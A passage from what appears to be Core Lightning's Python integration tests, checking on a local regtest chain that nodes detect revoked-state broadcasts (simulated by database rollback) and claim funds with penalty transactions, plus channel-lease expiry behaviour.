assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
'''
If our peer falls too far behind/doesn't send us an update for
their blockheight, the lessor fails the channel
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# sink the funding transaction
bitcoind.generate_block(1)
# stop l1
l1.stop()
# advance blockchain 1008 blocks, the lessor should drop to chain
bitcoind.generate_block(1008)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind):
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}
l1, l2, = node_factory.get_nodes(2, opts=opts)
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
# l1 leases a channel from l2
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
# l2 attempts to close a channel that it leased, should fail
with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
l2.rpc.close(l1.get_channel_scid(l2))
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
# We need to give l1-l2 time to update their blockheights
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(32)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
# l1<->l2 mutual close should work
chan = l1.get_channel_scid(l2)
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.rpc.close(chan)
l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
'''
Check that channel leases work
l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
'''
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'funder-lease-requests-only': False}
l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
# Allow l2 some warnings
l2.allow_warning = True
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l3.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# l2 leases a channel from l3
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate), minconf=0,
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
l3.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
inv = l2.rpc.invoice(10**4, '3', 'no_3')
l3.rpc.pay(inv['bolt11'])
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
l2.stop()
# unilateral close channels l1<->l2 & l3<->l2
l1.rpc.close(l2.info['id'], 1)
l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
# Wait til to_self_delay expires, l1 should claim to_local back
bitcoind.generate_block(10, wait_for_mempool=2)
l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
bitcoind.generate_block(1, wait_for_mempool=1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
assert len(l1.rpc.listfunds()['outputs']) == 2
l2.start()
search_start = l2.daemon.logsearch_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
l2.daemon.logsearch_start = search_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
# we *shouldn't* be able to spend it, there's a lock on it
with pytest.raises(RpcError, match='UTXO .* is csv locked'):
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# we *can* spend the 1csv lock one
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
# This can timeout, so do it in four easy stages.
for i in range(4):
bitcoind.generate_block(4032 // 4)
sync_blockheight(bitcoind, [l2, l3])
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# l3 cleans up their to-self after their lease expires
assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessee can recover funds if lessor cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_warning': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start(wait_for_bitcoind_sync=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l2])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l1.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l1 while l1 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l1.start()
sync_blockheight(bitcoind, [l1])
l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessor can recover funds if lessee cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l1
l1.stop()
l1_db_path = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l1_db_path_bak = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l1_db_path, l1_db_path_bak)
l1.start()
l1.rpc.connect(l1.info['id'], 'localhost', l1.port)
sync_blockheight(bitcoind, [l1])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l1's database
l1.stop()
l2.stop()
copyfile(l1_db_path_bak, l1_db_path)
# start l1 and force close channel with l2 while l2 is still offline
l1.start()
sync_blockheight(bitcoind, [l1])
l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l2.start()
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l1.daemon.wait_for_logs(['Grinding for to_remote',
'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts their htlc fulfill tx
l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4 = node_factory.line_graph(4,
opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None},
{'plugin': coin_mvt_plugin,
'disable-mpp': None,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'dev-no-reconnect': None,
'may_reconnect': True}],
wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
l2.rpc.waitsendpay(inv['payment_hash'])
# now we send one 'sticky' htlc: l4->l1
amt = 10**8 // 2
sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv['payment_hash']))
# l2 moves on for closed l3
bitcoind.generate_block(1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX'])
l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
bitcoind.generate_block(1)
l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
^---> l5
l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
both of which have a delay. l2 goes ahead and 'steals back' their
output + the htlc they fulfill
l3 comes back online, sees l2's cheat. takes funds from htlc timeout tx
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4, l5 = node_factory.get_nodes(
5,
opts=[
{
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'dev-no-reconnect': None,
}, {
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
'allow_broken_log': True,
}
]
)
node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
node_factory.join_nodes([l3, l5], wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
# now we send two 'sticky' htlcs, l1->l5 + l4->l1
amt = 10**8 // 2
sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2, now back a bit. force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv_2['payment_hash']))
# l2 moves on for closed l3
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
